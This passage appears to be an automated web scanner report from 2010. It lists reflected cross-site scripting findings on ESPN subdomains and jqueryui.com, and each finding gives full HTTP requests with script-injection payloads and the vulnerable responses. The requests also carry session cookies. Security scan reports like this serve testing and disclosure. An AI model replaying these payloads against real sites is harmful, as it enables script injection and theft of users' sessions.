HTTP/1.1 404 Not Found Connection: close Content-Length: 135 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-05/06
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/indexf2f55<script>alert(1)</script>52656a339f6</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d0146<script>alert(1)</script>35faeff8fe6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/newsd0146<script>alert(1)</script>35faeff8fe6 HTTP/1.1 Host: insider.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 134 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-05/06
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/newsd0146<script>alert(1)</script>35faeff8fe6</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 941a2<script>alert(1)</script>9a411c627fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/rumorcentral941a2<script>alert(1)</script>9a411c627fc HTTP/1.1 Host: insider.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 142 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-05/06
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/rumorcentral941a2<script>alert(1)</script>9a411c627fc</BODY></HTML>
5.48. http://insider.espn.go.com/insider/rumorcentral [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://insider.espn.go.com
Path:
/insider/rumorcentral
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eba35"><script>alert(1)</script>2279e161389 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/rumorcentral?eba35"><script>alert(1)</script>2279e161389=1 HTTP/1.1 Host: insider.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dfccc<script>alert(1)</script>5419d7c4d6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/sportindexdfccc<script>alert(1)</script>5419d7c4d6a HTTP/1.1 Host: insider.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 140 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-05/06
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/sportindexdfccc<script>alert(1)</script>5419d7c4d6a</BODY></HTML>
5.50. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jqueryui.com
Path:
/themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bddcf"><script>alert(1)</script>fc15db9fdd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?bddcf"><script>alert(1)</script>fc15db9fdd9=1 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 07 Nov 2010 00:35:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 117121
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3b753<script>alert(1)</script>9c552fecda5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /soccer3b753<script>alert(1)</script>9c552fecda5/ HTTP/1.1 Host: m.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 129 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/soccer3b753<script>alert(1)</script>9c552fecda5/</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 57344<script>alert(1)</script>4ba2aaa9554 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wireless57344<script>alert(1)</script>4ba2aaa9554/ HTTP/1.1 Host: m.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 131 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/wireless57344<script>alert(1)</script>4ba2aaa9554/</BODY></HTML>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 58f10<script>alert(1)</script>c39bdb4f674 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /outdoors/bassmaster/members58f10<script>alert(1)</script>c39bdb4f674/insider/resources/column HTTP/1.1 Host: proxy.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; s_sess=%20s_v3%3D2010_nbati_xxx_xxx_xxx_xxx%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D94%3B; CRBLM_LAST_UPDATE=1289009493; ESPN360beta=betaSet; userAB=7; lang=en; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009663777%7C1383617663777%3B%20s_c24_s%3DFirst%2520Visit%7C1289011463777%3B%20s_gpv_pn%3Despn%253Ancf%253Aindex%7C1289011463789%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 174 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CAO DSP CURi ADM DEV TAIi PSA PSD IVAi IVDi CONi OUR DELi SAMi BUS PHY ONL UNI COM NAV DEM CNT STA PRE Pool: pool-ESPN_proxy_bassmaster Via: 8810-09/10
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/outdoors/bassmaster/members58f10<script>alert(1)</script>c39bdb4f674/insider/resources/column</BODY></HTML>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 633a0<script>alert(1)</script>c2ca6d34533 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /outdoors/bassmaster/members633a0<script>alert(1)</script>c2ca6d34533/insider/story HTTP/1.1 Host: proxy.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; s_sess=%20s_v3%3D2010_nbati_xxx_xxx_xxx_xxx%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D94%3B; CRBLM_LAST_UPDATE=1289009493; ESPN360beta=betaSet; userAB=7; lang=en; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009663777%7C1383617663777%3B%20s_c24_s%3DFirst%2520Visit%7C1289011463777%3B%20s_gpv_pn%3Despn%253Ancf%253Aindex%7C1289011463789%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 163 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CAO DSP CURi ADM DEV TAIi PSA PSD IVAi IVDi CONi OUR DELi SAMi BUS PHY ONL UNI COM NAV DEM CNT STA PRE Pool: pool-ESPN_proxy_bassmaster Via: 8810-09/10
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/outdoors/bassmaster/members633a0<script>alert(1)</script>c2ca6d34533/insider/story</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e04cf<script>alert(1)</script>68bc7ba9f82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sendtofriende04cf<script>alert(1)</script>68bc7ba9f82/SendToFriend HTTP/1.1 Host: sendtofriend.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 147 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-03/04
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/sendtofriende04cf<script>alert(1)</script>68bc7ba9f82/SendToFriend</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7bae5<script>alert(1)</script>2f2d8562032 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sendtofriend7bae5<script>alert(1)</script>2f2d8562032/espn HTTP/1.1 Host: sendtofriend.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 139 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-03/04
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/sendtofriend7bae5<script>alert(1)</script>2f2d8562032/espn</BODY></HTML>
5.57. http://soccernet.espn.go.com/world-cup/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://soccernet.espn.go.com
Path:
/world-cup/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2757a"><script>alert(1)</script>d8f9d1d4373 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /world-cup/?2757a"><script>alert(1)</script>d8f9d1d4373=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 12:56:45 GMT Content-Type: text/html; charset=iso-8859-1 Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN15 Set-Cookie: SWID=3049331C-CFBF-4614-8EC0-FF585AF6D5A9; path=/; expires=Sat, 06-Nov-2030 12:56:42 GMT; domain=.go.com; Cache-Expires: Sat, 06 Nov 2010 12:58:42 GMT Content-Length: 71086 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 16 Nov 2010 12:56:45 GMT; Path=/; Domain=.go.com Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FIFA World Cup 2010 ...[SNIP]... <a href="/worldcup/?2757a"><script>alert(1)</script>d8f9d1d4373=1&topId=800475&linktext=Andres+Iniesta+fires+Spain+to+glory"> ...[SNIP]...
5.58. http://soccernet.espn.go.com/worldcup/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://soccernet.espn.go.com
Path:
/worldcup/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f969c"><script>alert(1)</script>f855b539bca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /worldcup/?f969c"><script>alert(1)</script>f855b539bca=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=120 Date: Sat, 06 Nov 2010 23:04:42 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:04:42 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN01 Cache-Expires: Sat, 06 Nov 2010 23:06:42 GMT Content-Length: 71086 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FIFA World Cup 2010 ...[SNIP]... <a href="/worldcup/?f969c"><script>alert(1)</script>f855b539bca=1&topId=800475&linktext=Andres+Iniesta+fires+Spain+to+glory"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2f74"><a>9d3befebb57 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/162/italyb2f74"><a>9d3befebb57 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:11:07 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:11:07 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Cache-Expires: Sat, 06 Nov 2010 23:16:07 GMT Content-Length: 81049 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Italy Football / So ...[SNIP]... <a href="/worldcup2010/team?team=162&_slug_=italyb2f74"><a>9d3befebb57&topId=792021&linktext=Lippi+takes+blame+for+Italy%27s+early+exit"> ...[SNIP]...
5.60. http://soccernet.espn.go.com/worldcup2010/team/_/team/162/italy [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/162/italy
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6efac"><a>1119d197ed9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/162/italy?6efac"><a>1119d197ed9=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:09:13 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:09:13 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 23:14:13 GMT Content-Length: 81157 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Italy Football / So ...[SNIP]... <a href="/worldcup2010/team?team=162&6efac"><a>1119d197ed9=1&_slug_=italy&6efac"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53655"><a>809ac03abe5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/164/spain53655"><a>809ac03abe5 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:29:00 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:29:00 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN06 Cache-Expires: Sat, 06 Nov 2010 23:34:00 GMT Content-Length: 80715 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
